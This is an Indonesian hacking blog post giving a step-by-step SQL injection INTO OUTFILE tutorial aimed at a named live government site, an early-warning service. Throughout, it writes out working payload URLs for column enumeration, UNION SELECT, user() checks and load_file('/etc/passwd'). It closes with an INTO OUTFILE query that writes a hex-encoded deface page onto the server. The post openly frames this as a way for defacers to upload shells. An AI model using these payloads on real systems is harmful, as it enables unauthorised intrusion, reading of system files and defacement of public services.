Beranda
DEFACE
HACKING

SQL Injection INTO OUTFILE #4

sqli into outfile
sqli into outfile

Tutorial SQLi Info Outfile

Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya akan membagikan tutorial SQL Into Outfile. Teknik ini biasanya digunakan oleh Defacer / gray hat untuk mengupload shell mereka di website yang sudah mereka targetkan.

Live target: 
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa

Langkah pertama lakukan pentesting terlebih dahulu apalah website tersebut vuln atau tidak. Beri tanda ' di parameternya, jika terjadi perubahan seperti blank, terdapat notif warning atau semacamnya yang membuat tampilan berubah itu berarti vuln. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'

error sqli into outfile
error sqli into outfile


Selanjutnya periksa jumlah column dengan memasukan query ORDER BY di URL 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+order+by+1--+-

Jika tampilan halaman kembali seperti semula ubah angka yang ada di URL menjadi 2, jika tidak ada perubahan ubah angka di URL secara perlahan.

Nah disini saya sudah mengetahui jumlah columnnya yaitu 8, Berikut querynya. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+order+by+8--+-

Jika angka di URL adalah 9, lalu terjadi tampilan halaman berubah menjadi blank atau sejenisnya itu berarti jumlah tabelnya ada 8.

melakukan order by
melakukan order by


Jika sudah hapus query order by tadi beserta angkanya, lalu masukan query UNION SELECT untuk menampilkan angka yang ditampilkan dihalaman.

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+union+select+1,2,3,4,5,6,7,8--+-

Jika tidak togelnya tidak muncul kasih tanda - dibelakang angka / huruf parameter

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+union+select+1,2,3,4,5,6,7,8--+-

Urutan angka seperti 1,2,3 dan seterusnya itu tergantung jumlah tabel, jadi jika jumlah tabel ada 100 berarti urutan angka yang ada di query UNION SELECT harus 1,2,3 sampai seratus. 

angka togel
angka togel

Jika sudah mengetahui angka togelnya silahkan masukan query user() sesuai angka togel yang muncul di halaman untuk mengecek user dari website tersebut, jika usernya seperti root@namaweb itu berarti vuln. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+union+select+1,2,3,4,user(),6,7,8--+-

user
user

Langkah selanjutnya adalah mengecek path agar bisa mengupload file diwebsite tersebut dengan memasukan query load_file('/etc'passwd') 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+union+select+1,2,3,4,load_file('/etc/passwd'),6,7,8--+-

path
path


Jika sudah masukan kode html yang sudah di encode ke kode hexadisimal, lalu masukan query into outfilenya. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+union+select+1,2,3,4,KODEHEX,6,7,8+INTO+OUTFILE+'path/namafile.html'--+-

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+union+select+1,2,3,4,0xa3c7469746c653e4861636b6564204279204d722058202d2054776f2047616e73202626202e2f4e616e615f43616e733c2f7469746c653e3c6c696e6b2072656c3d2269636f6e2220687265663d2268747470733a2f2f6b2e746f7034746f702e696f2f705f32303233796e663079302e6a70672220747970653d22696d6167652f706e67223e3c6d657461206e616d653d226465736372697074696f6e2220636f6e74656e743d22536861646f77205365637572652053797374656d223e3c7374796c653e626f6479207b206261636b67726f756e642d636f6c6f723a20233030303030303b636f6c6f723a20233030303030303b666f6e742d66616d696c793a204d6f6e6f73706163653b746578742d616c69676e3a2063656e7465723b7d3c626f6479206267636f6c6f723d22626c61636b223e3c2f7374796c653e3c7461626c652077696474683d223130302522206865696768743d2231303025223e3c746420616c69676e3d2263656e746572223e3c63656e7465723e3c7374796c653e40696d706f72742075726c282768747470733a2f2f666f6e74732e676f6f676c65617069732e636f6d2f637373323f66616d696c793d436f75726965722b5072696d6526646973706c61793d7377617027293b3c2f7374796c653e3c63656e7465723e3c62723e3c62723e3c62723e3c62723e3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e6439476353394a6f58696c6e4f5a654f676c6b6c5a78575a49687645315f67676234745961724a7726757371703d43415522206865696768743d22333530222077696474683d22333530223e3c62723e3c63656e7465723e3c666f6e742073697a653d2234302220636f6c6f723d227768697465223e50776e64204279204d722058202d2054776f3c2f666f6e743e3c62723e3c2f666f6e743e3c63656e7465723e3c666f6e742073697a653d22342220636f6c6f723d22776869,6,7,8+INTO+OUTFILE+'E:/WWW/of.html'--+-

Akses file:
https://cews.bmkg.go.id/namafile.html

Jika masih tidak paham, anda bisa menonton video dibawah. 


Nahkan sc defacenya ke upload, okelah sekian tutorial sql injection into outfile pada halaman ini, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum. 

Baca juga :

Posting Komentar